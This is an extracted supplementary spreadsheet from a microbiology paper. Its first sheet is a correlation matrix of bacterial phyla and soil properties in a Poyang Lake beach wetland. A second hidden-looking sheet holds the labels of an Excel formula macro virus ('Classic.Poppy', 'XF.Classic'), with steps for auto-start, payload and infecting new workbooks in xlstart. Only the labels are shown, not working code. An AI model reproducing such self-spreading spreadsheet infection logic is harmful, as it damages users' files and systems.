# Supplementary material for: Spatial distribution of bacterial communities driven by multiple environmental factors in a beach wetland of the largest freshwater lake in China
Source: Front Microbiol. 2015 Feb 26;6:129. doi: 10.3389/fmicb.2015.00129 (PMC4341555; doi:10.3389/fmicb.2015.00129)
Supplement: Table S2 — Correlation coefficients between all soil physicochemical variables. [file TableS2.XLSX]

## Sheet: Sheet1
Table S2 Correlation coefficients between all soil physicochemical variables
r	depth	distance	Ni	Pl	TM7	Ac	Ve	Cl	Act	Al	Del	Gam	Beta	unPro	Fi	Pro	shannon	Schao 1	WC	pH	NH4＋	NO3	SOC	SBD
distance	0
Ni	0.552**	0.218
Pl	0.306	0.196	0.0599
TM7	0.328	1.87e-05	0.0619	0.257
Ac	0.256	0.634**	0.0777	0.296	0.486**
Ve	0.383*	0.173	0.056	0.0619	0.056	0.0684
Cl	0.182	0.407*	0.127	0.222	0.202	0.28	0.0347
Act	0.417*	0.349	0.00253	0.299	0.283	0.522**	0.082	0.161
Al	0.651**	0.272	0.411*	0.24	0.284	0.323	0.168	0.168	0.223
Del	0.27	0.296	0.11	0.0356	0.145	0.257	0.00467	0.31	0.226	0.0894
Gam	0.0671	0.458*	0.248	0.0692	0.0377	0.331	0.142	0.2	0.0777	0.253	0.119
Beta	0.262	0.595**	0.282	0.0358	0.135	0.596**	0.0255	0.387*	0.152	0.0117	0.404*	0.133
unPro	0.304	0.321	0.214	0.218	0.129	0.236	0.00768	0.172	0.323	0.11	0.0243	0.163	0.341
Fi	0.31	0.656**	0.115	0.086	0.237	0.573**	0.102	0.377*	0.38*	0.378*	0.17	0.319	0.332	0.264
Pro	0.649**	0.43*	0.552**	0.166	0.145	0.31	0.0389	0.558**	0.221	0.522**	0.578**	0.296	0.647**	0.356	0.148
shannon	0.448*	0.393*	0.0836	0.275	0.187	0.32	0.188	0.173	0.661**	0.381*	0.448*	0.433*	0.0509	0.116	0.402*	0.289
Schao 1	0.085	0.007	0.27	0.327	0.137	0.119	0.066	0.26	0.041	0.057	0.155	0.252	0.183	0.122	0.19	0.087	0.436*
WC	0.022	0.677**	0.093	0.117	0.0406	0.603**	0.106	0.468**	0.0878	0.303	0.446*	0.337	0.579**	0.451*	0.562**	0.448*	0.0465	0.171
pH	0.265	0.0794	0.271	0.283	0.268	0.138	0.429*	0.00685	0.401*	0.0764	0.177	0.165	0.0502	0.391*	0.187	0.168	0.0582	0.026	0.328
NH4+	0.62**	0.297	0.359	0.251	0.145	0.159	0.437*	0.169	0.136	0.591**	0.0786	0.107	0.0433	0.247	0.265	0.328	0.246	0.178	0.0853	0.227
NO3	0.339	0.0858	0.245	0.137	0.153	0.243	0.0714	0.0631	0.28	0.392*	0.0345	0.0247	0.337	0.0924	0.265	0.364*	0.013	0.052	0.0191	0.489**	0.349
SOC	0.281	0.405*	0.164	0.145	0.0622	0.259	0.374*	0.234	0.109	0.00543	0.346	0.15	0.462**	0.378*	0.279	0.454*	0.073	0.417*	0.512**	0.365*	0.0548	0.00364
SBD	0.561**	0.0837	0.365*	0.334	0.345	0.0699	0.17	0.492*	0.112	0.604**	0.0164	0.0295	0.204	0.338	0.0883	0.516**	0.291	0.074	0.228	0.112	0.709**	0.306	0.195
a **: P ≤ 0.01; * P ≤ 0.05; The absence of * or ** indicates non-significance of the correlation coefficient.
r: correlation coefficients
WC: Water Contents
NH4+: NH4+ concentration
NO3-: NO3- concentration
SOC: soil organic carbon
SBD: soil bulk density
Pro: Proteobacteria, Al: Alphaproteobacteria, Beta: Betaproteobacteria, Gama: Gammaproteobacteria, Del: Deltaproteobacteria, Act: Actinobacteria, Ac: Acidobacteria, Cl: Chloroflexi, Fi: Firmicutes, Ni: Nitrospira, Pl: Planctomycetes, TM7, Ve: Verrucomicrobia.

## Sheet: 00000ppy
Sheet2
Table 2 Correlation coefficients between all soil physicochemical variables.xlsx
C:\Program Files\Microsoft Office\OFFICE11\xlstart\Book1.		**Auto and On Sheet Starts Here**
#N/A
Classic.Poppy by VicodinES
With Lord Natas
An Excel Formula Macro Virus (XF.Classic)
Hydrocodone/APAP 10-650 For Your Computer
(C) The Narkotic Network 1998
**Simple Payload**
		**Set Our Values and Paths**
**Add New Workbook, Infect It, Save It As Book1.xls**
		**Infect Workbook**
